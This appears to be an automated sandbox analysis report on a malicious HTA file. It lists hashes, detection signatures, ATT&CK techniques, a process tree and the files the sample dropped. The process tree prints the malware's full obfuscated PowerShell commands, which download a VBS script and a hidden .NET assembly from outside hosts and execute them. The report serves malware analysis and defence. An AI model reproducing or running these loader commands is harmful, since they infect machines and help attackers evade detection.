98423a9f9031d55d618d2b6247e6724a96264cc7f10a20fb35ee475fada464c7

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29-10-2024 06:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
Size

131KB
MD5

c8cbdfd8a9cde5597983e48f8a9dff18
SHA1

df42a953a8f67e4bc41d8cb1cc9a707bd358617c
SHA256

98423a9f9031d55d618d2b6247e6724a96264cc7f10a20fb35ee475fada464c7
SHA512

18a54603e30fa03c6f6671a0d47eb7fe9942f7aefc038649222aa204561a3c50fe775c2c83c4d240757ef82fcbdaa4c86c8fe1e249c30abdd6bc76b16a8b4587
SSDEEP

96:4vCt7Qm6c4rJAcUJrH6FE4/JCgfXjaPW8/85ScHtcYggzZbrUZcKqQ:4vCF3KrJ2rg3Ugy6rDQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

poWERsHELl.eXepowershell.exe

flow	pid	Process
4	1980	poWERsHELl.eXe
6	2884	powershell.exe
8	2884	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2140	powershell.exe
2884	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

Processes:

poWERsHELl.eXepowershell.exe

pid	Process
1980	poWERsHELl.eXe
2976	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
6	drive.google.com
5	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exepoWERsHELl.eXepowershell.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERsHELl.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

poWERsHELl.eXepowershell.exepowershell.exepowershell.exe

pid	Process
1980	poWERsHELl.eXe
2976	powershell.exe
1980	poWERsHELl.eXe
1980	poWERsHELl.eXe
2140	powershell.exe
2884	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

poWERsHELl.eXepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1980	poWERsHELl.eXe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepoWERsHELl.eXecsc.exeWScript.exepowershell.exe

description	pid	Process	procid_target
PID 1908 wrote to memory of 1980	1908	mshta.exe	30
PID 1908 wrote to memory of 1980	1908	mshta.exe	30
PID 1908 wrote to memory of 1980	1908	mshta.exe	30
PID 1908 wrote to memory of 1980	1908	mshta.exe	30
PID 1980 wrote to memory of 2976	1980	poWERsHELl.eXe	32
PID 1980 wrote to memory of 2976	1980	poWERsHELl.eXe	32
PID 1980 wrote to memory of 2976	1980	poWERsHELl.eXe	32
PID 1980 wrote to memory of 2976	1980	poWERsHELl.eXe	32
PID 1980 wrote to memory of 2732	1980	poWERsHELl.eXe	33
PID 1980 wrote to memory of 2732	1980	poWERsHELl.eXe	33
PID 1980 wrote to memory of 2732	1980	poWERsHELl.eXe	33
PID 1980 wrote to memory of 2732	1980	poWERsHELl.eXe	33
PID 2732 wrote to memory of 2208	2732	csc.exe	34
PID 2732 wrote to memory of 2208	2732	csc.exe	34
PID 2732 wrote to memory of 2208	2732	csc.exe	34
PID 2732 wrote to memory of 2208	2732	csc.exe	34
PID 1980 wrote to memory of 2680	1980	poWERsHELl.eXe	36
PID 1980 wrote to memory of 2680	1980	poWERsHELl.eXe	36
PID 1980 wrote to memory of 2680	1980	poWERsHELl.eXe	36
PID 1980 wrote to memory of 2680	1980	poWERsHELl.eXe	36
PID 2680 wrote to memory of 2140	2680	WScript.exe	37
PID 2680 wrote to memory of 2140	2680	WScript.exe	37
PID 2680 wrote to memory of 2140	2680	WScript.exe	37
PID 2680 wrote to memory of 2140	2680	WScript.exe	37
PID 2140 wrote to memory of 2884	2140	powershell.exe	39
PID 2140 wrote to memory of 2884	2140	powershell.exe	39
PID 2140 wrote to memory of 2884	2140	powershell.exe	39
PID 2140 wrote to memory of 2884	2140	powershell.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodthingstoapprovethebestwaytounderstandhowmuchgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\SysWOW64\WindowSpOwERshelL\v1.0\poWERsHELl.eXe
  "C:\Windows\SystEm32\WindowSpOwERshelL\v1.0\poWERsHELl.eXe" "POwersHell -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT ; iex($(iEx('[sYsTeM.teXt.ENCOdinG]'+[ChaR]0X3a+[chAr]58+'UTF8.gETsTrINg([sySteM.cONVErt]'+[ChAr]58+[chaR]58+'fRombaSe64STRiNg('+[cHAr]0x22+'JDBjWklXOXhNdFR4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFUkRFRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWklDaFJKY2l4a04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ4a0dZZERlZnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJd3NkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCb1JuKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVc1hUUWciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnFreiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwY1pJVzl4TXRUeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzMxMi91dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kb3dpdGhtZS50SUYiLCIkRU52OkFQUERBVEFcdXRoaW5raWFtdGhlZ29vZHRoaW5nc2ZvcnVnaXZlbm1lYmVzdHRoaW5nc3RvZC52YlMiLDAsMCk7U1RBUnQtc0xlZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVx1dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kLnZiUyI='+[ChAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2976
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dun8r8or.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB76E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB76D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2208
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnN3ZZaW1hZ2VVcmwgPSB3MlBodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB3MlA7N3ZZd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlJysnYkNsaWVudDs3dllpbWFnZUJ5dGVzID0gN3ZZd2ViQ2xpZW50LkRvd25sb2FkRGF0YSg3dllpbWFnZVVybCk7N3ZZJysnaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoN3ZZaW1hZ2VCeXRlcyk7N3ZZc3RhcnQnKydGbGFnID0gdzJQPDxCQVNFNjRfU1RBUlQ+PncyUDsnKyc3dlllbmRGbGFnID0gdzJQPDxCQVNFJysnNjRfRU5EPj53MlA7N3ZZc3RhcnRJbmRleCA9IDd2WWltYWdlVGV4dC5JbmRleE9mKDd2WXN0YXJ0RmxhJysnZyk7N3ZZZW5kSW5kZXggPSA3dllpbWFnZVRleHQuSW5kZXhPZig3dlllbmRGbGFnKTs3dllzdGFydEluZGV4IC1nZSAwIC1hbmQgN3ZZZW5kSW5kZXggLWd0IDd2WXN0YXJ0SW5kZXg7N3ZZc3RhcnRJbicrJ2RleCArPSA3dllzdGFydEZsYWcuTGVuJysnZ3QnKydoOzd2WWJhc2U2NExlbmd0aCA9IDd2WWVuZEluZGV4IC0gN3ZZc3RhcnRJbmRleDs3dlliYXNlNjRDb21tYW5kID0gN3ZZaW1hZ2VUZXh0LlN1YnN0cmluZyg3dllzdGFydEluZGV4LCA3dlliYXNlNjRMZW5ndGgpOzd2WWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKDd2WWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqR3cgRm9yRWFjaC1PYmplY3QgeyA3dllfIH0pWy0xLi4tKDd2WWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07N3ZZY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5DbycrJ252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0JysncmluZyg3dlliYXNlNjRSZXZlcnNlZCk7N3ZZbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1iJysnbHldOjpMb2FkKDd2WWNvbW1hJysnbmRCeXRlcyk7N3ZZdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3MlBWQUl3MlApOzd2WXZhaU1ldGhvJysnZC5JbnZva2UoN3ZZbnVsbCwgQCh3MlB0eHQuU0dPTEtMLzIxMy81NTEuODcxLjY0Ljg5MS8vOnB0dGh3MlAsIHcyJysnUGRlc2F0aXZhZG93MlAsIHcyUGRlc2F0aXZhZG93MlAsIHcyUGRlJysnc2F0aXZhZG93MlAsJysnIHcyUGFzcG5ldF9yZWdiJysncm93c2Vyc3cyUCwgdzJQZGVzYXRpdmFkb3cyUCwgdzJQZGVzYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2F0aXZhZG93MlAsdzJQZGVzJysnYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2EnKyd0aXYnKydhZG93JysnMlAsdzJQMXcyUCx3MlBkZXNhdGl2YWRvdzJQKSk7JykgLUNyRVBsQWNlKFtjSGFSXTExOStbY0hhUl01MCtbY0hhUl04MCksW2NIYVJdMzkgLXJFcGxBY2UgICc3dlknLFtjSGFSXTM2LXJFcGxBY2Unakd3JyxbY0hhUl0xMjQpIHwgJiAoICRwc0hvTUVbMjFdKyRwc0hvTUVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2140
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('7vYimageUrl = w2Phttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur w2P;7vYwebClient = New-Object System.Net.We'+'bClient;7vYimageBytes = 7vYwebClient.DownloadData(7vYimageUrl);7vY'+'ima'+'geText = [System.Text.Encoding]::UTF8.GetString'+'(7vYimageBytes);7vYstart'+'Flag = w2P<<BASE64_START>>w2P;'+'7vYendFlag = w2P<<BASE'+'64_END>>w2P;7vYstartIndex = 7vYimageText.IndexOf(7vYstartFla'+'g);7vYendIndex = 7vYimageText.IndexOf(7vYendFlag);7vYstartIndex -ge 0 -and 7vYendIndex -gt 7vYstartIndex;7vYstartIn'+'dex += 7vYstartFlag.Len'+'gt'+'h;7vYbase64Length = 7vYendIndex - 7vYstartIndex;7vYbase64Command = 7vYimageText.Substring(7vYstartIndex, 7vYbase64Length);7vYbase64Reversed = -join (7vYbase64Command.ToCharArray() jGw ForEach-Object { 7vY_ })[-1..-(7vYbase64Command.Length)];7vYcommandBytes = [System.Co'+'nvert]::F'+'romBase64St'+'ring(7vYbase64Reversed);7vYloadedAssembly = [System.Reflection.Assemb'+'ly]::Load(7vYcomma'+'ndBytes);7vYvaiMethod = [dnlib.IO.Home].GetMethod(w2PVAIw2P);7vYvaiMetho'+'d.Invoke(7vYnull, @(w2Ptxt.SGOLKL/213/551.871.64.891//:ptthw2P, w2'+'Pdesativadow2P, w2Pdesativadow2P, w2Pde'+'sativadow2P,'+' w2Paspnet_regb'+'rowsersw2P, w2Pdesativadow2P, w2Pdesativadow2P,w2Pdesativadow2P,w2Pdesativadow2P,w2Pdes'+'ativadow2P,w2Pdesativadow2P,w2Pdesa'+'tiv'+'adow'+'2P,w2P1w2P,w2Pdesativadow2P));') -CrEPlAce([cHaR]119+[cHaR]50+[cHaR]80),[cHaR]39 -rEplAce '7vY',[cHaR]36-rEplAce'jGw',[cHaR]124) | & ( $psHoME[21]+$psHoME[30]+'X')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB76E.tmp

Filesize
1KB

MD5
44a04952a325e3033713caab7e26dbae

SHA1
4aa312aae0272fb7888bed718ec532af26d1920b

SHA256
37d53a1835a70081ea9706bd449210ca94ddf0ba3b9e8a9424a09bc877e28a12

SHA512
c7f97985426fe42d519e3a96b35fb42f758003c330924eee378107f5dd6ef9476da730717b39e4eb63fd6389d5c40c4c39385f850587173c0016e6166b766c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dun8r8or.dll

Filesize
3KB

MD5
8b647c635bb87ed0b41deb965a971da8

SHA1
ef344a065f99470e9c9ff309fa57c974a08572dd

SHA256
c6458e238a7fab08731dd38c131282b2b66bf29281adeda4bc16af9fff4a9ce3

SHA512
fc8516f5028e814104704f78752adc7f409a0d8b9bcf6fca09733f77b2e8ded6d929a322b0ed8900990e50202e5147c445a6de6874705fc09e1f45a04ab3081f

Download Submit
C:\Users\Admin\AppData\Local\Temp\dun8r8or.pdb

Filesize
7KB

MD5
de75102ec5deb7adf7fc5422955483a1

SHA1
2fbd494db1fbd406da105889c9848d55badf0b91

SHA256
f313a54d4e2500c0e87a3a67a91d788b0b4e176dacede372c3e9067543e5946c

SHA512
8ffe71700b59809cea13fc57369fc1b97f49db5e06818179d976070665a47a36c1cb309d1eb1080e1edf514887398acd1b9c97b58bd624f766853223a957808d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
77c5fe8907ca9a0d089594b5270de9b1

SHA1
084de7291816d7e29e15511d070f893657de97fb

SHA256
6f28052e36b1bb70050d9d7ffa71ccd01407bc79ce724e995cc035039963b5d4

SHA512
3f12510faebf04eab59e4b0efe9de68ca57a6e5fbb7e0b2f3e58db789e8aa6f96e646fd04bbfe62d37841f69dd637a8713e74cddd3856741648ea13eeaeece51

Download Submit
C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS

Filesize
136KB

MD5
f1580330671ef5f9f2c0525092a52a1e

SHA1
e22a52d31f506f4b23fffdf438b2a87c630520d3

SHA256
aa9e57ff6fa9792bc9f8bd02acbd5d248f2e6e361e0516a8972265a90002ed6b

SHA512
940477c296ff67079eaed9cf0a0e894450b919e6d8416e7bc0b8c0031c8c16d5ad1d9a4757d17627cc9f2ceb331f0f432e78d8621497fcf2085e37ea39ca6fa3

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB76D.tmp

Filesize
652B

MD5
1d220b312becc8ab81cd70eeb9d75672

SHA1
594965d5ebd4432cc51c9a89604cc04eb931f6fb

SHA256
5199cf453a2facd1de0d15fc2ecc1b5058c1ae25d06e98ad724e2a6680ed8142

SHA512
35638c3b7817adcfbd125d588c9f6660f7b07ede29ee154c20b18febef3e4d1430ab2117c8f743f54e58dc90750e30236e764280377a4465941cd7764a5056ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dun8r8or.0.cs

Filesize
461B

MD5
47833bec615200eabb6b94b9402215d9

SHA1
0d09d6af10eb9d2eaa1f0b3083d7417715634610

SHA256
ca55753945475d20ea711d447df602805205d08d77f7fb3495b85e90cb759e02

SHA512
f94e3794f1efd72a4dd88ffa98f4be25b165281f5184e31522995e683b6b17ae4c898127927e7ec257d3794405c560e7b1e5d9c941c88e6a79c95cef794ceeb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dun8r8or.cmdline

Filesize
309B

MD5
fbda6208a9583ca671dd63b6c3a4646c

SHA1
a572134c71629761da76d7e13b85940dc5f22cce

SHA256
960e5e7173620e983a01a4b4d3b7e9ec13da815a7685293880dffc858e6d0132

SHA512
0068eadfdc312159cbb764ab590116cac4869b21b5f1cafbe0518078562615b50ce46e569d64b62dc4b420bbf9a157093df4e93f27125ea2a94f17e3cb94539d

Download Submit